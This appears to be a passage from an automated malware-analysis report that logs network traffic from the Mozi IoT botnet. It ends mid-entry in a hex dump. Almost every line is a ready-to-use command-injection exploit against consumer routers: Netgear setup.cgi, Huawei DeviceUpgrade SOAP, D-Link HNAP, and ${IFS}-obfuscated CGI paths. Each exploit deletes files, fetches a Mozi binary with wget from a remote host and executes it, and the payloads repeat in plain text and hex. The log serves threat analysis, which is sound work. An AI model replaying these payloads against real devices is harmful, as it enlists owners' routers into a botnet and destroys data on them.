                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 199.78.188.107:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 142.128.212.69:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 90.236.152.184:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 84.103.186.161:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 71.6.227.0:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 90.21.207.168:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 69.229.221.117:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 